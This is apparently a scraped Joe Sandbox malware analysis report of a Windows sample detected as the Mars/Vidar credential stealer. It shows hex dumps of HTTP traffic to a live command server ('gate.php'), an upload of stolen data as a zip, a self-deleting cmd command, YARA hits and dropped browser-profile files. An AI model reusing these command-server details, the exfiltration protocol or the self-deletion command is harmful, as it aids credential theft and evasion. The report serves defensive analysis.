Nov 20, 2023 05:21:11.743716955 CET	6	IN	Data Raw: e7 ff ac 9e 89 c4 ab 83 30 58 96 cc 60 6e 12 03 a7 32 b6 ff a7 28 57 93 4e 06 06 bd 4e af 02 bd 7a 1d a9 73 0c a5 6e 65 b2 ba 73 b6 84 ba 51 09 d6 b3 8b a9 c3 6b be 41 e5 c8 a4 b3 2e f3 25 d2 ca 0d a5 75 75 b2 d6 95 49 5a 47 eb dc 75 b6 88 2a d6 Data Ascii: 0X`n2(WNNzsnesQkA.%uuIZGu*gP}:;Z7}UrsT'P#5EWlycK4)\|}XK[rY%<,.&_b.&v/&azbj~ZHlvc5g^0\D_z
Nov 20, 2023 05:21:11.743735075 CET	8	IN	Data Raw: a3 10 4f 7e 90 0a f1 f5 60 d2 7d 23 97 35 ae ea 7f 43 9e 8d e0 e8 44 c3 25 ea 2a ae 50 a3 b6 54 89 da 92 54 2a b4 97 c9 ab 7b bc 98 7b 70 07 56 f2 15 dc e9 57 eb c2 56 55 e2 76 55 e2 4e 75 d6 6e 92 e6 11 7e 9f 3a fd 90 3a fd e5 68 b5 55 14 38 b2 Data Ascii: O~`}#5CD%PTT{{pVWVUvUNun~::hU8DHH+JFDjz#LTYK;%TvR1bR&0#=qI8Qe)qHKBE-FxlAG^'7DB(QLnhaH "tE$pKmfA
Nov 20, 2023 05:21:11.743782997 CET	9	IN	Data Raw: 0f a9 4d 0b 6f 33 52 a2 35 f7 bf 9b b2 65 35 05 2d 29 b5 8e 68 97 68 84 b6 34 85 10 cd d9 d2 d3 db 43 51 39 b1 97 0f 12 a5 34 a9 54 88 0c 0b 1b d4 12 f6 c5 0d 48 ce 9b 76 9c 9e 26 40 da fe 8c b4 7a 33 50 42 89 19 f8 d2 56 aa 0a d6 97 0a b0 33 8a Data Ascii: Mo3R5e5-)hh4CQ94THv&@z3PBV3NQ=6T%_C&y2]u>:\W!u%r]\W'u7YN5)K&DNox\avtwvQ7h(n64g1s`E
Nov 20, 2023 05:21:11.743802071 CET	10	IN	Data Raw: e4 ed 45 6c f0 8f f8 c7 82 bc ca a2 9e 2a 74 7f 10 b4 9a a1 2d 07 fd 2c c2 30 29 89 f2 8a 5f 62 99 f3 2b 7e 45 3f b9 9f a0 12 25 99 d3 f6 27 ea 41 39 2f b8 08 67 54 be 75 4a 62 84 d6 53 ad 2e 42 64 2e b6 c0 84 04 54 bf 49 49 ea 2c d2 a4 80 ea b7 Data Ascii: El*t-,0)_b+~E?%'A9/gTuJbS.Bd.TII,q/ZjRqEk,Yg sW\|ORb"6$^,tMx](>v54]\[-[;}'<w[YP:lQl#Vzu[DH9]
Nov 20, 2023 05:21:11.743865967 CET	12	IN	Data Raw: f9 b4 e2 80 de 08 8e c7 ae e6 18 46 9d fd 09 ed 2e 66 d5 6b 82 6e e2 87 f5 f8 a1 fe 30 b4 b1 c7 da 19 a2 d4 5e e7 7e 18 b4 08 7c 95 ec de 22 2f d8 29 d7 77 c9 f5 4f 03 45 04 44 91 ae eb 13 8c 00 8c dd d2 ad c5 42 c7 32 d4 8a 88 6f f8 55 9f 4d 6a Data Ascii: F.fkn0^~\|"/)wOEDB2oUMj+cmIe!\|Q^UdCu<E+WVU8wIzC(^k[:.Pv++&SufWq\^B~B0Mg6UYcwq 6DV+/^
Nov 20, 2023 05:21:11.743892908 CET	13	IN	Data Raw: ae 0e 29 33 e7 2f 97 95 bb f1 58 52 ae 6e 39 fa d4 3c 76 8b 15 07 d7 53 bd c4 90 83 e6 28 49 b4 da 28 81 57 23 be 56 47 e4 ea d5 72 f5 5a 59 22 45 bd d4 49 7f 37 c1 df e5 3d d2 5d 14 d8 37 8e 7a 57 e0 60 eb f0 b0 2c a9 8a 79 00 03 53 62 19 f0 09 Data Ascii: )3/XRn9<vS(I(W#VGrZY"EI7=]7zW`,ySblD?\k=u6oD~?g4O/B7aMT{#U@O{%?kvr8N%Jway^.f!2MY6i#m6PlhW9GDpAX
Nov 20, 2023 05:21:11.938690901 CET	15	IN	Data Raw: 7d 50 08 42 1f ad d1 00 1d 79 38 64 07 6c 3c 29 3e a7 a1 01 36 7c 54 ae 2d 3d 24 70 9e 03 48 35 ae b8 f8 61 d2 23 0d 0a 01 a5 a3 44 99 6b 53 6a 53 03 49 6a d4 fb 4c 64 1c c6 ba fc 26 d1 ae cc 6d e1 e3 82 31 29 b5 37 b9 a6 6d 12 cb b5 a3 41 d8 49 Data Ascii: }PBy8dl<)>6\|T-=$pH5a#DkSjSIjLd&m1)7mAIIiR)y!aW-&H\|KcAt#V&W3SkE0NcKock\|<);BGygkC.n%G8&tyl6/)c-bXbr
Nov 20, 2023 05:21:16.526065111 CET	1663	OUT	POST /gate.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAI Host: alpha.twinsources.shop Content-Length: 70268 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45
Nov 20, 2023 05:21:16.526187897 CET	1674	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4e 59 43 32 4e 4f 38 51 31 44 4a Data Ascii: ------DTRQIEUAAI58YUAIContent-Disposition: form-data; name="file"NYC2NO8Q1DJEU3.zip------DTRQIEUAAI58YUAIContent-Disposition: form-data; name="file"; filename="NYC2NO8Q1DJEU3.zip"Content-Type: application/octet-streamContent-Tran
Nov 20, 2023 05:21:16.752567053 CET	1697	OUT	Data Raw: 31 21 3f fb 86 33 a5 50 e2 23 5b c9 e8 85 e0 96 07 a4 a3 f1 99 02 9f 6c a4 73 ab 4f b2 1c 0f 91 aa 2f 0a ea d4 47 91 3a 96 cf 6c 25 a4 3f 2b 34 58 4b 0e 7f 63 ca 89 2b 48 c3 55 ec 32 79 fb 76 6e b8 ef 1a 0d cf e3 ee 07 a5 ab 53 76 6a 78 7f 2d 36 Data Ascii: 1!?3P#[lsO/G:l%?+4XKc+HU2yvnSvjx-6fhXfqDT\1u7OOK)3*S`HSwwf_nHomEV"nN;e3#W~w~kd/>S}T)!eAuMVu_jt\|\Wj
Nov 20, 2023 05:21:16.969795942 CET	1730	OUT	Data Raw: 25 b6 f2 66 33 e5 24 22 cd 8e 1e 43 3e ce 89 ea 60 f4 4f 9f ea da b5 da ec 31 3e bd b3 b4 cb 64 f3 96 0a c4 f9 50 81 05 e1 49 8b 95 e1 d5 04 dc 1b c9 dc 05 04 df a5 6c 8c 99 24 e0 87 f5 a6 78 19 0b a0 37 cc 18 ee 43 06 c9 77 f5 2c 05 0d 8d 73 42 Data Ascii: %f3$"C>`O1>dPIl$x7Cw,sBrx8]S$7'R8O88khLbN azflRGT@2je~ufmZgnN?X(<KBW@\|qCOzlNN(pV!DT )>lZ!= /3S-V.Sk
Nov 20, 2023 05:21:17.209099054 CET	1732	OUT	Data Raw: 8e 10 d8 a8 e6 de bb b4 fb 05 44 c2 f6 aa b6 3d 43 a7 ab ef 6c 9a 7e 09 73 6b 4a f0 cc 89 39 88 b2 30 b3 c6 22 03 cb a5 ca a2 ed 68 47 0a 3c cb 27 4c 12 26 14 ce 29 dc 03 f0 80 5a 64 26 9a 87 3c fb d3 6f bf f1 d6 c1 bd e4 9a df ca 2e aa 28 69 fd Data Ascii: D=Cl~skJ90"hG<'L&)Zd&<o.(i;R*Sf4>b~OUueO{sf\~]r4gTc7<'Xl#BkoBY;wrTU_]/~2khpSC)RV\_N
Nov 20, 2023 05:21:17.460087061 CET	1732	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/8.2.11 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache content-type: text/html; charset=UTF-8 content-length: 0 date: Mon, 20 Nov 2023 04:21:17 GMT server: LiteSpeed

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	179.43.170.230	80	192.168.2.4	49731	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Timestamp	kBytes transferred	Direction	Data
Nov 20, 2023 05:21:10.998145103 CET	0	OUT	GET /gate.php HTTP/1.1 Host: alpha.twinsources.shop Connection: Keep-Alive Cache-Control: no-cache
Nov 20, 2023 05:21:11.234833956 CET	1	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/8.2.11 set-cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45; path=/ expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache content-type: text/html; charset=UTF-8 content-length: 28 date: Mon, 20 Nov 2023 04:21:11 GMT server: LiteSpeed Data Raw: 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 56 78 52 47 78 51 64 56 5a 4c 62 31 4a 38 Data Ascii: MXwxfDF8MXwxfDVxRGxQdVZLb1J8
Nov 20, 2023 05:21:11.553064108 CET	1	OUT	GET /request HTTP/1.1 Host: alpha.twinsources.shop Cache-Control: no-cache Cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45
Nov 20, 2023 05:21:11.743609905 CET	1	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 last-modified: Mon, 21 Feb 2022 16:34:00 GMT accept-ranges: bytes content-length: 1565849 date: Mon, 20 Nov 2023 04:21:11 GMT server: LiteSpeed
Nov 20, 2023 05:21:11.743663073 CET	2	IN	Data Raw: 50 4b 03 04 14 00 00 00 08 00 0d 7a 3e 54 c5 85 06 76 05 31 01 00 d0 35 02 00 0c 00 00 00 73 6f 66 74 6f 6b 6e 33 2e 64 6c 6c ec 5b 7d 78 14 45 9a ef 9e 99 84 49 98 64 1a 48 30 3c 04 09 6c f0 b2 8a 18 18 58 12 09 18 20 9d 8d 42 60 d8 81 99 04 c8 Data Ascii: PKz>Tv15softokn3.dll[}xEIdH0<lX B`_:BOP(xxw97I`E]\aqKts19z+d,3LC20d.<5a6j}U6l^$lC^bOkM
Nov 20, 2023 05:21:11.743680000 CET	4	IN	Data Raw: dc 0c 65 a3 ed 5b 95 6a 2c c4 2d 34 f9 12 33 51 db e9 dd 70 74 aa be 44 6e 35 96 c8 bf a6 98 08 6a a5 05 9d 4a d1 0b 92 8c 15 fb 5f 29 c8 15 23 e4 71 0a d2 63 dc 85 d6 a6 18 8d ef a7 77 a1 bb cc 38 5f d2 ed 42 b9 29 f4 2e 74 99 de 85 be b6 e9 d9 Data Ascii: e[j,-43QptDn5jJ_)#qcw8_B).tt@A^o3}yd'hct(-w`CH;)4BP`f\b51M6{6{2c8HX!;w(v#9hh[L3{66;bHV7BNSF
Nov 20, 2023 05:21:11.743696928 CET	5	IN	Data Raw: 96 56 fc 8e ce d2 a5 e4 89 16 56 4e a5 78 70 b7 3e ac db c5 21 ca 2e 5a 40 a8 e8 e5 a8 a5 b7 0a 33 cc 83 5f 28 c7 b2 34 16 a8 ce fa bb 3e 18 ac fc 8e 00 16 79 5a 2c 26 aa 14 4a f1 42 49 4d 30 10 79 74 5a 18 23 17 ba fd 3d e8 fb 16 2e 0c aa 49 59 Data Ascii: VVNxp>!.Z@3_(4>yZ,&JBIM0ytZ#=.IY58Osx06+3e3"o?c4MkwWi26miDqUq>oJ<}rRkg5\X,g-nAY\|O}u/S1];mkQ
Nov 20, 2023 05:21:11.743716955 CET	6	IN	Data Raw: e7 ff ac 9e 89 c4 ab 83 30 58 96 cc 60 6e 12 03 a7 32 b6 ff a7 28 57 93 4e 06 06 bd 4e af 02 bd 7a 1d a9 73 0c a5 6e 65 b2 ba 73 b6 84 ba 51 09 d6 b3 8b a9 c3 6b be 41 e5 c8 a4 b3 2e f3 25 d2 ca 0d a5 75 75 b2 d6 95 49 5a 47 eb dc 75 b6 88 2a d6 Data Ascii: 0X`n2(WNNzsnesQkA.%uuIZGu*gP}:;Z7}UrsT'P#5EWlycK4)\|}XK[rY%<,.&_b.&v/&azbj~ZHlvc5g^0\D_z
Nov 20, 2023 05:21:11.743735075 CET	8	IN	Data Raw: a3 10 4f 7e 90 0a f1 f5 60 d2 7d 23 97 35 ae ea 7f 43 9e 8d e0 e8 44 c3 25 ea 2a ae 50 a3 b6 54 89 da 92 54 2a b4 97 c9 ab 7b bc 98 7b 70 07 56 f2 15 dc e9 57 eb c2 56 55 e2 76 55 e2 4e 75 d6 6e 92 e6 11 7e 9f 3a fd 90 3a fd e5 68 b5 55 14 38 b2 Data Ascii: O~`}#5CD%PTT{{pVWVUvUNun~::hU8DHH+JFDjz#LTYK;%TvR1bR&0#=qI8Qe)qHKBE-FxlAG^'7DB(QLnhaH "tE$pKmfA
Nov 20, 2023 05:21:11.743782997 CET	9	IN	Data Raw: 0f a9 4d 0b 6f 33 52 a2 35 f7 bf 9b b2 65 35 05 2d 29 b5 8e 68 97 68 84 b6 34 85 10 cd d9 d2 d3 db 43 51 39 b1 97 0f 12 a5 34 a9 54 88 0c 0b 1b d4 12 f6 c5 0d 48 ce 9b 76 9c 9e 26 40 da fe 8c b4 7a 33 50 42 89 19 f8 d2 56 aa 0a d6 97 0a b0 33 8a Data Ascii: Mo3R5e5-)hh4CQ94THv&@z3PBV3NQ=6T%_C&y2]u>:\W!u%r]\W'u7YN5)K&DNox\avtwvQ7h(n64g1s`E
Nov 20, 2023 05:21:11.743802071 CET	10	IN	Data Raw: e4 ed 45 6c f0 8f f8 c7 82 bc ca a2 9e 2a 74 7f 10 b4 9a a1 2d 07 fd 2c c2 30 29 89 f2 8a 5f 62 99 f3 2b 7e 45 3f b9 9f a0 12 25 99 d3 f6 27 ea 41 39 2f b8 08 67 54 be 75 4a 62 84 d6 53 ad 2e 42 64 2e b6 c0 84 04 54 bf 49 49 ea 2c d2 a4 80 ea b7 Data Ascii: El*t-,0)_b+~E?%'A9/gTuJbS.Bd.TII,q/ZjRqEk,Yg sW\|ORb"6$^,tMx](>v54]\[-[;}'<w[YP:lQl#Vzu[DH9]
Nov 20, 2023 05:21:11.743865967 CET	12	IN	Data Raw: f9 b4 e2 80 de 08 8e c7 ae e6 18 46 9d fd 09 ed 2e 66 d5 6b 82 6e e2 87 f5 f8 a1 fe 30 b4 b1 c7 da 19 a2 d4 5e e7 7e 18 b4 08 7c 95 ec de 22 2f d8 29 d7 77 c9 f5 4f 03 45 04 44 91 ae eb 13 8c 00 8c dd d2 ad c5 42 c7 32 d4 8a 88 6f f8 55 9f 4d 6a Data Ascii: F.fkn0^~\|"/)wOEDB2oUMj+cmIe!\|Q^UdCu<E+WVU8wIzC(^k[:.Pv++&SufWq\^B~B0Mg6UYcwq 6DV+/^
Nov 20, 2023 05:21:11.743892908 CET	13	IN	Data Raw: ae 0e 29 33 e7 2f 97 95 bb f1 58 52 ae 6e 39 fa d4 3c 76 8b 15 07 d7 53 bd c4 90 83 e6 28 49 b4 da 28 81 57 23 be 56 47 e4 ea d5 72 f5 5a 59 22 45 bd d4 49 7f 37 c1 df e5 3d d2 5d 14 d8 37 8e 7a 57 e0 60 eb f0 b0 2c a9 8a 79 00 03 53 62 19 f0 09 Data Ascii: )3/XRn9<vS(I(W#VGrZY"EI7=]7zW`,ySblD?\k=u6oD~?g4O/B7aMT{#U@O{%?kvr8N%Jway^.f!2MY6i#m6PlhW9GDpAX
Nov 20, 2023 05:21:11.938690901 CET	15	IN	Data Raw: 7d 50 08 42 1f ad d1 00 1d 79 38 64 07 6c 3c 29 3e a7 a1 01 36 7c 54 ae 2d 3d 24 70 9e 03 48 35 ae b8 f8 61 d2 23 0d 0a 01 a5 a3 44 99 6b 53 6a 53 03 49 6a d4 fb 4c 64 1c c6 ba fc 26 d1 ae cc 6d e1 e3 82 31 29 b5 37 b9 a6 6d 12 cb b5 a3 41 d8 49 Data Ascii: }PBy8dl<)>6\|T-=$pH5a#DkSjSIjLd&m1)7mAIIiR)y!aW-&H\|KcAt#V&W3SkE0NcKock\|<);BGygkC.n%G8&tyl6/)c-bXbr
Nov 20, 2023 05:21:16.526065111 CET	1663	OUT	POST /gate.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DTRQIEUAAI58YUAI Host: alpha.twinsources.shop Content-Length: 70268 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=5cjm0m95uuldn06f5j8ngk6f45
Nov 20, 2023 05:21:16.526187897 CET	1674	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 54 52 51 49 45 55 41 41 49 35 38 59 55 41 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4e 59 43 32 4e 4f 38 51 31 44 4a Data Ascii: ------DTRQIEUAAI58YUAIContent-Disposition: form-data; name="file"NYC2NO8Q1DJEU3.zip------DTRQIEUAAI58YUAIContent-Disposition: form-data; name="file"; filename="NYC2NO8Q1DJEU3.zip"Content-Type: application/octet-streamContent-Tran
Nov 20, 2023 05:21:16.752567053 CET	1697	OUT	Data Raw: 31 21 3f fb 86 33 a5 50 e2 23 5b c9 e8 85 e0 96 07 a4 a3 f1 99 02 9f 6c a4 73 ab 4f b2 1c 0f 91 aa 2f 0a ea d4 47 91 3a 96 cf 6c 25 a4 3f 2b 34 58 4b 0e 7f 63 ca 89 2b 48 c3 55 ec 32 79 fb 76 6e b8 ef 1a 0d cf e3 ee 07 a5 ab 53 76 6a 78 7f 2d 36 Data Ascii: 1!?3P#[lsO/G:l%?+4XKc+HU2yvnSvjx-6fhXfqDT\1u7OOK)3*S`HSwwf_nHomEV"nN;e3#W~w~kd/>S}T)!eAuMVu_jt\|\Wj
Nov 20, 2023 05:21:16.969795942 CET	1730	OUT	Data Raw: 25 b6 f2 66 33 e5 24 22 cd 8e 1e 43 3e ce 89 ea 60 f4 4f 9f ea da b5 da ec 31 3e bd b3 b4 cb 64 f3 96 0a c4 f9 50 81 05 e1 49 8b 95 e1 d5 04 dc 1b c9 dc 05 04 df a5 6c 8c 99 24 e0 87 f5 a6 78 19 0b a0 37 cc 18 ee 43 06 c9 77 f5 2c 05 0d 8d 73 42 Data Ascii: %f3$"C>`O1>dPIl$x7Cw,sBrx8]S$7'R8O88khLbN azflRGT@2je~ufmZgnN?X(<KBW@\|qCOzlNN(pV!DT )>lZ!= /3S-V.Sk
Nov 20, 2023 05:21:17.209099054 CET	1732	OUT	Data Raw: 8e 10 d8 a8 e6 de bb b4 fb 05 44 c2 f6 aa b6 3d 43 a7 ab ef 6c 9a 7e 09 73 6b 4a f0 cc 89 39 88 b2 30 b3 c6 22 03 cb a5 ca a2 ed 68 47 0a 3c cb 27 4c 12 26 14 ce 29 dc 03 f0 80 5a 64 26 9a 87 3c fb d3 6f bf f1 d6 c1 bd e4 9a df ca 2e aa 28 69 fd Data Ascii: D=Cl~skJ90"hG<'L&)Zd&<o.(i;R*Sf4>b~OUueO{sf\~]r4gTc7<'Xl#BkoBY;wrTU_]/~2khpSC)RV\_N
Nov 20, 2023 05:21:17.460087061 CET	1732	IN	HTTP/1.1 200 OK Connection: Keep-Alive Keep-Alive: timeout=5, max=100 x-powered-by: PHP/8.2.11 expires: Thu, 19 Nov 1981 08:52:00 GMT cache-control: no-store, no-cache, must-revalidate pragma: no-cache content-type: text/html; charset=UTF-8 content-length: 0 date: Mon, 20 Nov 2023 04:21:17 GMT server: LiteSpeed

Target ID:	0
Start time:	05:21:02
Start date:	20/11/2023
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe
Imagebase:	0x400000
File size:	200'096 bytes
MD5 hash:	076AC01EA35D4B4A78130FFE0B0DA1B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: Windows_Trojan_ArkeiStealer_84c7086a, Description: unknown, Source: 00000000.00000002.1854624029.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Author: unknown Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1854693658.000000000043E000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_MarsStealer, Description: Yara detected Mars stealer, Source: 00000000.00000002.1854680983.000000000043C000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.1855026120.0000000000600000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:21:17
Start date:	20/11/2023
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe" & exit
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:21:17
Start date:	20/11/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:21:17
Start date:	20/11/2023
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 5
Imagebase:	0x110000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Mars Stealer

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\freebl3.dll

C:\ProgramData\mozglue.dll

C:\ProgramData\msvcp140.dll

C:\ProgramData\nss3.dll

C:\ProgramData\softokn3.dll

C:\ProgramData\vcruntime140.dll

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

C:\Users\user\Desktop\4E3O8YCT

C:\Users\user\Desktop\HLXTR1D2

C:\Users\user\Desktop\JE3OPZM7

C:\Users\user\Desktop\UKXLFU3O

C:\Users\user\Desktop\US0HLXBA

Static File Info

Windows Analysis Report
SecuriteInfo.com.Win32.Evo-gen.25423.22998.exe